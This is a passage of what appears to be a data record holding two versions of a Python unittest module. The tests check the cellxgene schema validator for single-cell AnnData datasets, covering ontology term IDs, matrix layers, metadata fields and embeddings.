(ORGANOID)'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n\n def test_is_primary_data(self):\n \"\"\"\n is_primary_data\tbool. This MUST be True if this is the canonical instance of this cellular\n observation and False if not. This is commonly False\n for meta-analyses reusing data or for secondary views of data.\n \"\"\"\n self.validator.adata.obs['is_primary_data'] = 'FALSE'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'is_primary_data' in dataframe 'obs' must be boolean, not 'object'.\"\n ])\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-5": "import unittest\n\nimport numpy\nimport pandas as pd\n\nimport fixtures.examples_validate as examples\nfrom cellxgene_schema.validate import Validator\nfrom cellxgene_schema.write_labels import AnnDataLabelAppender\n\n\n# Tests for schema compliance of an AnnData object\n\n\nclass TestValidAnndata(unittest.TestCase):\n\n \"\"\"\n Tests a valid AnnData object. Most other tests below modify this AnnData object and test for failure cases.\n\n The valid AnnData object has all valid cases described in the schema.\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_valid_anndata(self):\n self.validator.validate_adata()\n self.assertFalse(self.validator.errors)\n\n\nclass TestH5adValidation(unittest.TestCase):\n\n \"\"\"\n Checks that validation from h5ad works, only does one invalid example as extensive testing is done in the classes\n below\n \"\"\"\n\n def setUp(self):\n self.h5ad_valid_file = examples.h5ad_valid\n self.h5ad_invalid_file = examples.h5ad_invalid\n self.validator = Validator()\n\n def test_validate(self):\n\n # Valid h5ad\n self.assertTrue(self.validator.validate_adata(self.h5ad_valid_file))\n\n # Invalid h5ads\n self.assertFalse(self.validator.validate_adata(self.h5ad_invalid_file))\n\n\nclass TestExpressionMatrix(unittest.TestCase):\n\n \"\"\"\n Fail cases for expression matrices (anndata.X and anndata.raw.X)\n \"\"\"\n\n def setUp(self):\n\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_shapes(self):\n\n \"\"\"\n All matrix layers MUST have the same shape, and have the same cell labels and gene labels.\n \"\"\"\n\n # Creates a raw layer\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.raw.var.drop(\"feature_is_filtered\", axis=1, inplace=True)\n self.validator.adata.X = examples.adata_non_raw.X.copy()\n self.validator.adata.uns[\"X_normalization\"] = \"CPM\"\n\n # remove one gene\n self.validator.adata = self.validator.adata[:, 1:]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\"ERROR: Number of genes in X (3) is different than raw.X (4).\"],\n )\n\n def test_sparsity(self):\n\n \"\"\"\n In any layer, if a matrix has 50% or more values that are zeros, it is STRONGLY RECOMMENDED that\n the matrix be encoded as a scipy.sparse.csr_matrix\n \"\"\"\n\n self.validator.adata.X = self.validator.adata.X.toarray()\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.warnings,\n [\n \"WARNING: Sparsity of 'X' is 0.875 which is greater than 0.5, \"\n \"and it is not a 'scipy.sparse.csr_matrix'. It is \"\n \"STRONGLY RECOMMENDED to use this type of matrix for \"\n \"the given sparsity.\"\n ],\n )\n\n def test_raw_existence(self):\n\n \"\"\"\n Except for ATAC-seq and methylation data, raw data is REQUIRED\n \"\"\"\n\n # RNA - raw layer required\n del self.validator.adata.raw\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Raw data is missing: there is no 'raw.X' and 'X_normalization' is not 'none'.\"\n ],\n )\n\n # ATAC - raw layer not required\n # The assignment above makes X to not be raw: self.validator.adata.uns[\"X_normalization\"] = \"CPM\"\n # The following line makes it to be scATAC-seq data (EFO:0010891)\n # Missing raw data in atac-seq data is allowed, thus the following should not return an error message\n self.validator.errors = []\n self.validator.adata.obs[\"assay_ontology_term_id\"] = \"EFO:0010891\"\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n\n def test_final_strongly_recommended(self):\n\n \"\"\"\n Except for ATAC-seq and methylation data, final matrix is STRONGLY RECOMMENDED\n \"\"\"\n\n # move raw to X amd: i.e. there is no final\n self.validator.adata.X = self.validator.adata.raw.X\n del self.validator.adata.raw\n self.validator.adata.uns[\"X_normalization\"] = \"none\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.warnings,\n [\n \"WARNING: Only raw data was found, i.e. there is no 'raw.X' and 'uns['X_normalization']' is 'none'. \"\n \"It is STRONGLY RECOMMENDED that 'final' (normalized) data is provided.\"\n ],\n )\n\n\nclass TestObs(unittest.TestCase):\n\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_column_presence(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n \"\"\"\n\n columns = [\n \"assay_ontology_term_id\",\n \"development_stage_ontology_term_id\",\n \"disease_ontology_term_id\",\n \"ethnicity_ontology_term_id\",\n \"is_primary_data\",\n \"sex_ontology_term_id\",\n \"tissue_ontology_term_id\",\n ]\n\n for column in columns:\n with self.subTest(column=column):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n\n self.validator.adata.obs.drop(column, axis=1, inplace=True)\n # Remove batch condition because it has a dependency with is_primary_data\n self.validator.adata.uns.pop(\"batch_condition\")\n\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [f\"ERROR: Dataframe 'obs' is missing \" f\"column '{column}'.\"],\n )\n\n def test_column_presence_organism(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n\n A separate check is need for organism_ontology_term_id because removing from anndata results in multiple\n errors given that other columns depend on its presence\n \"\"\"\n\n self.validator.adata.obs.drop(\"organism_ontology_term_id\", axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: Dataframe 'obs' is missing column \"\n \"'organism_ontology_term_id'.\",\n \"ERROR: Checking values with dependencies failed for \"\n \"adata.obs['ethnicity_ontology_term_id'], this is likely due \"\n \"to missing dependent column in adata.obs.\",\n \"ERROR: Checking values with dependencies failed for \"\n \"adata.obs['development_stage_ontology_term_id'], this is likely due \"\n \"to missing dependent column in adata.obs.\",\n ],\n )\n\n def test_obsolete_term_id(self):\n \"\"\"\n Terms documented as obsolete in an ontology MUST NOT be used. For example, EFO:0009310\n for obsolete_10x v2 was marked as obsolete in EFO version 3.31.0 and replaced by\n EFO:0009899 for 10x 3' v2.\n\n https://www.ebi.ac.uk/ols/ontologies/efo/terms?short_form=EFO_0009310\n \"\"\"\n\n # Not a valid term\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"EFO:0009310\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is a deprecated term id of 'EFO'.\",\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is not a child term id \"\n \"of '[['EFO:0002772', 'EFO:0010183']]'.\",\n ],\n )\n\n def test_assay_ontology_term_id(self):\n\n \"\"\"\n assay_ontology_term_id categorical with str categories.\n This MUST be an EFO term and either child of \"EFO:0002772\" or \"EFO:0010183\"\n If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to\n the most accurate term. For example, the sci-plex assay could be curated as \"EFO:0010183 (sci-plex)\"\n \"\"\"\n\n # Not a valid term\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"CL:000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid \"\n \"ontology term id of 'EFO'.\",\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child \"\n \"term id of '[['EFO:0002772', 'EFO:0010183']]'.\",\n ],\n )\n\n # Not a valid child\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a \"\n \"child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ],\n )\n\n # Not a clarifying text\n self.validator.adata.obs[\"assay_ontology_term_id\"][0] = \"EFO:0010183 sci-plex\"\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\",\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of \"\n \"'[['EFO:0002772', 'EFO:0010183']]'.\",\n ],\n )\n\n def test_cell_type_ontology_term_id(self):\n\n \"\"\"\n cell_type_ontology_term_id categorical with str categories. This MUST be a CL term.\n \"\"\"\n\n # Not a valid term\n self.validator.adata.obs[\"cell_type_ontology_term_id\"][0] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'cell_type_ontology_term_id' is not a valid \"\n \"ontology term id of 'CL'.\"\n ],\n )\n\n def test_development_stage_ontology_term_id_human(self):\n\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:9606\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"EFO:0000001\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is \"\n \"not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' \"\n \"(Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ],\n )\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10090\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"EFO:0000001\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is \"\n \"not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' \"\n \"(Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ],\n )\n\n def test_development_stage_ontology_term_id_all_species(self):\n\n \"\"\"\n All other it MUST be children of UBERON:0000105 and not UBERON:0000071\n \"\"\"\n\n # Fail case not an UBERON term\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10114\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"EFO:0000001\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is \"\n \"not a valid ontology term id of 'UBERON'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' \"\n \"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of \"\n \"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\",\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not \"\n \"a child term id of '[['UBERON:0000105']]'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' \"\n \"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of \"\n \"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\",\n ],\n )\n\n # All other it MUST be children of UBERON:0000105 and not UBERON:0000071\n # Fail case UBERON:0000071\n self.validator.errors = []\n self.validator.adata.obs[\"organism_ontology_term_id\"][0] = \"NCBITaxon:10114\"\n self.validator.adata.obs[\"development_stage_ontology_term_id\"][\n 0\n ] = \"UBERON:0000071\"\n self.validator.adata.obs[\"ethnicity_ontology_term_id\"][0] = \"na\"\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: 'UBERON:0000071' in 'development_stage_ontology_term_id' is not allowed'. When \"\n \"'organism_ontology_term_id' is not 'NCBITaxon:10090' \"\n \"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of \"\n \"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\",\n ],\n )\n\n def test_disease_ontology_term_id(self):\n\n \"\"\"\n disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or\n PATO:0000461 for normal or healthy.\n \"\"\"\n\n # Invalid ontology\n 